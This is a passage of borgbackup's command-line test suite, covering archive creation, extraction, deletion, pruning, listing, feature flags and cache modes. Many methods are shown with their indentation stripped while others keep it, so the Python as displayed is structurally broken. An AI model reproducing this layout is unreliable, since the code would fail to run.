self.assert_in(' input/dir1/dir2/file', output)
def test_exclude_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test1')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
with changedir('input'):
self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test3')
self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
def test_repeated_files(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input')
    def test_overwrite(self):
        """Extracting over existing files/empty dirs succeeds; a non-empty dir in the way fails."""
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('dir2/file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        # Overwriting regular files and directories should be supported
        os.mkdir('output/input')
        os.mkdir('output/input/file1')  # empty dir where the archive has a regular file
        os.mkdir('output/input/dir2')
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test')
        self.assert_dirs_equal('input', 'output/input')
        # But non-empty dirs should fail
        os.unlink('output/input/file1')  # remove the extracted file first
        os.mkdir('output/input/file1')
        os.mkdir('output/input/file1/dir')  # makes the dir non-empty -> extract must fail
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', exit_code=1)
def test_rename(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test', 'test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test.2', 'test.4')
self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
# Make sure both archives have been renamed
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 2)
self.assert_in('test.3', manifest.archives)
self.assert_in('test.4', manifest.archives)
def test_info(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = self.cmd('info', self.repository_location)
assert 'All archives:' in info_repo
info_archive = self.cmd('info', self.repository_location + '::test')
assert 'Archive name: test\n' in info_archive
info_archive = self.cmd('info', '--first', '1', self.repository_location)
assert 'Archive name: test\n' in info_archive
def test_info_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
repository = info_repo['repository']
assert len(repository['id']) == 64
assert 'last_modified' in repository
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert info_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in info_repo['encryption']
cache = info_repo['cache']
stats = cache['stats']
assert all(isinstance(o, int) for o in stats.values())
assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
assert info_repo['repository'] == info_archive['repository']
assert info_repo['cache'] == info_archive['cache']
archives = info_archive['archives']
assert len(archives) == 1
archive = archives[0]
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
assert datetime.strptime(archive['start'], ISO_FORMAT)
assert datetime.strptime(archive['end'], ISO_FORMAT)
def test_comment(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
self.cmd('recreate', self.repository_location + '::test4', '12345')
assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
def test_delete(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('create', self.repository_location + '::test.3', 'input')
self.cmd('create', self.repository_location + '::another_test.1', 'input')
self.cmd('create', self.repository_location + '::another_test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('delete', '--prefix', 'another_', self.repository_location)
self.cmd('delete', '--last', '1', self.repository_location)
self.cmd('delete', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
self.assert_in('Deleted data:', output)
# Make sure all data except the manifest has been deleted
with Repository(self.repository_path) as repository:
self.assert_equal(len(repository), 1)
def test_delete_multiple(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('create', self.repository_location + '::test3', 'input')
self.cmd('delete', self.repository_location + '::test1', 'test2')
self.cmd('extract', '--dry-run', self.repository_location + '::test3')
self.cmd('delete', self.repository_location, 'test3')
assert not self.cmd('list', self.repository_location)
    def test_delete_repo(self):
        """Deleting a whole repository requires BORG_DELETE_I_KNOW_WHAT_I_AM_DOING=YES."""
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('dir2/file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.cmd('create', self.repository_location + '::test.2', 'input')
        # any value other than YES must abort the deletion (exit code 2)
        os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
        self.cmd('delete', self.repository_location, exit_code=2)
        assert os.path.exists(self.repository_path)
        os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        self.cmd('delete', self.repository_location)
        # Make sure the repo is gone
        # NOTE(review): the env var stays set to 'YES' afterwards -- presumably the
        # test harness resets os.environ between tests; confirm to rule out leakage.
        self.assertFalse(os.path.exists(self.repository_path))
    def test_delete_force(self):
        """delete --force must succeed (with a warning) on an archive with a missing chunk."""
        self.cmd('init', '--encryption=none', self.repository_location)
        self.create_src_archive('test')
        with Repository(self.repository_path, exclusive=True) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            archive = Archive(repository, key, manifest, 'test')
            # corrupt the archive: drop the first data chunk of the first chunked item
            for item in archive.iter_items():
                if 'chunks' in item:
                    first_chunk_id = item.chunks[0].id
                    repository.delete(first_chunk_id)
                    repository.commit(compact=False)
                    break
        output = self.cmd('delete', '--force', self.repository_location + '::test')
        self.assert_in('deleted archive was corrupted', output)
        # repair so the repository is consistent again, then verify the archive is gone
        self.cmd('check', '--repair', self.repository_location)
        output = self.cmd('list', self.repository_location)
        self.assert_not_in('test', output)
def test_delete_double_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
id = archive.metadata.items[0]
repository.put(id, b'corrupted items metadata stream chunk')
repository.commit(compact=False)
self.cmd('delete', '--force', '--force', self.repository_location + '::test')
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
    def test_corrupted_repository(self):
        """check must detect on-disk corruption of a segment file and exit with code 1."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        self.cmd('extract', '--dry-run', self.repository_location + '::test')
        output = self.cmd('check', '--show-version', self.repository_location)
        self.assert_in('borgbackup version', output)  # implied output even without --info given
        self.assert_not_in('Starting repository check', output)  # --info not given for root logger
        # pick the second-newest segment file in data/0 and overwrite 4 bytes inside it
        name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
        with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
            fd.seek(100)
            fd.write(b'XXXX')
        output = self.cmd('check', '--info', self.repository_location, exit_code=1)
        self.assert_in('Starting repository check', output)  # --info given for root logger
    # we currently need to be able to create a lock directory inside the repo:
    @pytest.mark.xfail(reason="we need to be able to create the lock directory inside the repo")
    def test_readonly_repository(self):
        """Read-only access (extract --dry-run) from a chmod'ed-read-only repository."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('test')
        # NOTE(review): os.system with string concatenation would break on paths with
        # spaces/shell metacharacters -- fine for the test tmpdir, but worth confirming.
        os.system('chmod -R ugo-w ' + self.repository_path)
        try:
            self.cmd('extract', '--dry-run', self.repository_location + '::test')
        finally:
            # Restore permissions so shutil.rmtree is able to delete it
            os.system('chmod -R u+w ' + self.repository_path)
@pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
def test_umask(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
mode = os.stat(self.repository_path).st_mode
self.assertEqual(stat.S_IMODE(mode), 0o700)
def test_create_dry_run(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
# Make sure no archive has been created
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 0)
    def add_unknown_feature(self, operation):
        """Mark *operation* in the manifest as requiring a feature no borg knows about.

        Used by the test_unknown_feature_* tests to verify that commands refuse
        to act on a repository with unsupported mandatory feature flags.
        """
        with Repository(self.repository_path, exclusive=True) as repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
            manifest.write()
            repository.commit(compact=False)
def cmd_raises_unknown_feature(self, args):
if self.FORK_DEFAULT:
self.cmd(*args, exit_code=EXIT_ERROR)
else:
with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
self.cmd(*args)
assert excinfo.value.args == (['unknown-feature'],)
def test_unknown_feature_on_create(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.WRITE)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_cache_sync(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
self.add_unknown_feature(Manifest.Operation.READ)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_change_passphrase(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
def test_unknown_feature_on_read(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
with changedir('output'):
self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['list', self.repository_location])
self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
def test_unknown_feature_on_rename(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
def test_unknown_feature_on_delete(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.DELETE)
# delete of an archive raises
self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
# delete of the whole repository ignores features
self.cmd('delete', self.repository_location)
    @unittest.skipUnless(has_llfuse, 'llfuse not installed')
    def test_unknown_feature_on_mount(self):
        """mount must refuse when READ demands an unknown mandatory feature."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        self.add_unknown_feature(Manifest.Operation.READ)
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        os.mkdir(mountpoint)
        # XXX this might hang if it doesn't raise an error
        self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
    @pytest.mark.allow_cache_wipe
    def test_unknown_mandatory_feature_in_cache(self):
        """An unknown mandatory feature recorded in the local *cache* (not the repo)
        must cause the cache to be wiped and rebuilt on the next create."""
        if self.prefix:
            path_prefix = 'ssh://__testsuite__'
        else:
            path_prefix = ''
        print(self.cmd('init', '--encryption=repokey', self.repository_location))
        # inject the bogus feature flag into the cache config
        with Repository(self.repository_path, exclusive=True) as repository:
            if path_prefix:
                repository._location = Location(self.repository_location)
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                cache.begin_txn()
                cache.cache_config.mandatory_features = set(['unknown-feature'])
                cache.commit()
        if self.FORK_DEFAULT:
            # forked: success of the command is all we can observe
            self.cmd('create', self.repository_location + '::test', 'input')
        else:
            # in-process: additionally verify that wipe_cache() actually gets called
            called = False
            wipe_cache_safe = LocalCache.wipe_cache
            def wipe_wrapper(*args):
                nonlocal called
                called = True
                wipe_cache_safe(*args)
            with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
                self.cmd('create', self.repository_location + '::test', 'input')
            assert called
        # the rebuilt cache must no longer carry the bogus feature flag
        with Repository(self.repository_path, exclusive=True) as repository:
            if path_prefix:
                repository._location = Location(self.repository_location)
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            with Cache(repository, key, manifest) as cache:
                assert cache.cache_config.mandatory_features == set([])
def test_progress_on(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
self.assert_in("\r", output)
def test_progress_off(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', self.repository_location + '::test5', 'input')
self.assert_not_in("\r", output)
def test_file_status(self):
"""test that various file status show expected results
clearly incomplete: only tests for the weird "unchanged" status for now"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
# should find first file as unmodified
output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
self.assert_in("U input/file1", output)
# this is expected, although surprising, for why, see:
# https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
self.assert_in("A input/file2", output)
    def test_file_status_cs_cache_mode(self):
        """test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
        self.create_regular_file('file1', contents=b'123')
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=10)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
        # modify file1, but cheat with the mtime (and atime) and also keep same size:
        st = os.stat('input/file1')
        self.create_regular_file('file1', contents=b'321')
        # restore the pre-modification atime/mtime (nanosecond precision)
        os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
        # this mode uses ctime for change detection, so it should find file1 as modified
        # (rewriting the file bumped ctime, which cannot be faked from userspace)
        output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
        self.assert_in("M input/file1", output)
def test_file_status_ms_cache_mode(self):
"""test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
# change mode of file1, no content change:
st = os.stat('input/file1')
os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged
# this mode uses mtime for change detection, so it should find file1 as unmodified
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
self.assert_in("U input/file1", output)
def test_file_status_rc_cache_mode(self):
"""test that files get rechunked unconditionally in rechunk,ctime cache mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
# no changes here, but this mode rechunks unconditionally
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
self.assert_in("A input/file1", output)
    def test_file_status_excluded(self):
        """test that excluded paths are listed"""
        self.create_regular_file('file1', size=1024 * 80)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=1024 * 80)
        if has_lchflags:
            # file3 gets the nodump flag, so --exclude-nodump will skip it
            self.create_regular_file('file3', size=1024 * 80)
            platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
        self.assert_in("A input/file1", output)
        self.assert_in("A input/file2", output)
        if has_lchflags:
            self.assert_in("x input/file3", output)
        # should find second file as excluded
        output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
        self.assert_in("U input/file1", output)
        self.assert_in("x input/file2", output)
        if has_lchflags:
            self.assert_in("x input/file3", output)
def test_create_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
# The usual keys
assert 'encryption' in create_info
assert 'repository' in create_info
assert 'cache' in create_info
assert 'last_modified' in create_info['repository']
archive = create_info['archive']
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
    def test_create_topical(self):
        """test the --list / --filter knobs that control file listing during 'create'."""
        self.create_regular_file('file1', size=1024 * 80)
        time.sleep(1)  # file2 must have newer timestamps than file1
        self.create_regular_file('file2', size=1024 * 80)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # no listing by default
        output = self.cmd('create', self.repository_location + '::test', 'input')
        self.assert_not_in('file1', output)
        # shouldn't be listed even if unchanged
        output = self.cmd('create', self.repository_location + '::test0', 'input')
        self.assert_not_in('file1', output)
        # should list the file as unchanged
        output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
        self.assert_in('file1', output)
        # should *not* list the file as changed
        output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
        self.assert_not_in('file1', output)
        # change the file
        self.create_regular_file('file1', size=1024 * 100)
        # should list the file as changed
        output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
        self.assert_in('file1', output)
    @pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
    def test_create_read_special_symlink(self):
        """--read-special must follow a symlink to a FIFO and archive the FIFO's *content*."""
        from threading import Thread
        def fifo_feeder(fifo_fn, data):
            # runs in a background thread: opening the FIFO for writing
            # blocks until borg opens it for reading
            fd = os.open(fifo_fn, os.O_WRONLY)
            try:
                os.write(fd, data)
            finally:
                os.close(fd)
        self.cmd('init', '--encryption=repokey', self.repository_location)
        archive = self.repository_location + '::test'
        data = b'foobar' * 1000
        fifo_fn = os.path.join(self.input_path, 'fifo')
        link_fn = os.path.join(self.input_path, 'link_fifo')
        os.mkfifo(fifo_fn)
        os.symlink(fifo_fn, link_fn)
        t = Thread(target=fifo_feeder, args=(fifo_fn, data))
        t.start()
        try:
            self.cmd('create', '--read-special', archive, 'input/link_fifo')
        finally:
            t.join()
        with changedir('output'):
            self.cmd('extract', archive)
            # the extracted entry must be a regular file holding the fed data
            fifo_fn = 'input/link_fifo'
            with open(fifo_fn, 'rb') as f:
                extracted_data = f.read()
        assert extracted_data == data
def test_create_read_special_broken_symlink(self):
os.symlink('somewhere doesnt exist', os.path.join(self.input_path, 'link'))
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '--read-special', archive, 'input')
output = self.cmd('list', archive)
assert 'input/link -> somewhere doesnt exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
def test_prune_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
# these are not really a checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
assert re.search(r'Would prune:\s+test1', output)
# must keep the latest non-checkpoint archive:
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
# must keep the latest checkpoint archive:
assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.assert_in('test3.checkpoint', output)
self.assert_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
# the latest non-checkpoint archive must be still there:
self.assert_in('test2', output)
# only the latest checkpoint archive must still be there:
self.assert_not_in('test3.checkpoint', output)
self.assert_not_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
# now we supercede the latest checkpoint by a successful backup:
self.cmd('create', self.repository_location + '::test5', src_dir)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
# all checkpoints should be gone now:
self.assert_not_in('checkpoint', output)
# the latest archive must be still there
self.assert_in('test5', output)
def test_prune_repository_save_space(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
assert re.search(r'Would prune:\s+test1', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=2')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
self.assert_in('test2', output)
    def test_prune_repository_prefix(self):
        """prune --prefix must only consider archives whose name starts with the prefix."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
        self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
        self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
        self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
        output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--prefix=foo-')
        assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
        assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
        output = self.cmd('list', self.repository_location)
        # dry-run must not remove anything
        self.assert_in('foo-2015-08-12-10:00', output)
        self.assert_in('foo-2015-08-12-20:00', output)
        self.assert_in('bar-2015-08-12-10:00', output)
        self.assert_in('bar-2015-08-12-20:00', output)
        self.cmd('prune', self.repository_location, '--keep-daily=2', '--prefix=foo-')
        output = self.cmd('list', self.repository_location)
        # only the matching foo-* archives are pruned; bar-* stays untouched
        self.assert_not_in('foo-2015-08-12-10:00', output)
        self.assert_in('foo-2015-08-12-20:00', output)
        self.assert_in('bar-2015-08-12-10:00', output)
        self.assert_in('bar-2015-08-12-20:00', output)
    def test_prune_repository_glob(self):
        """prune --glob-archives must only consider archives matching the glob."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
        self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
        self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
        self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
        output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
        assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
        assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
        output = self.cmd('list', self.repository_location)
        # dry-run must not remove anything
        self.assert_in('2015-08-12-10:00-foo', output)
        self.assert_in('2015-08-12-20:00-foo', output)
        self.assert_in('2015-08-12-10:00-bar', output)
        self.assert_in('2015-08-12-20:00-bar', output)
        self.cmd('prune', self.repository_location, '--keep-daily=2', '--glob-archives=2015-*-foo')
        output = self.cmd('list', self.repository_location)
        # only the matching *-foo archives are pruned; *-bar stays untouched
        self.assert_not_in('2015-08-12-10:00-foo', output)
        self.assert_in('2015-08-12-20:00-foo', output)
        self.assert_in('2015-08-12-10:00-bar', output)
        self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test-1', src_dir)
self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
self.cmd('create', self.repository_location + '::test-2', src_dir)
output = self.cmd('list', '--prefix=test-', self.repository_location)
self.assert_in('test-1', output)
self.assert_in('test-2', output)
self.assert_not_in('something-else', output)
def test_list_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, src_dir)
output_1 = self.cmd('list', test_archive)
output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
self.assertEqual(output_1, output_2)
self.assertNotEqual(output_1, output_3)
    def test_list_repository_format(self):
        """test the --format / --short placeholders of a repository-level 'list'."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
        self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
        output_1 = self.cmd('list', self.repository_location)
        output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
        # the default format must equal its explicit equivalent
        self.assertEqual(output_1, output_2)
        output_1 = self.cmd('list', '--short', self.repository_location)
        self.assertEqual(output_1, 'test-1\ntest-2\n')
        output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
        self.assertEqual(output_1, 'test-1/test-2/')
        output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
        self.assert_in('test-1 comment 1\n', output_3)
        self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('amb', contents=b'a' * 1000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
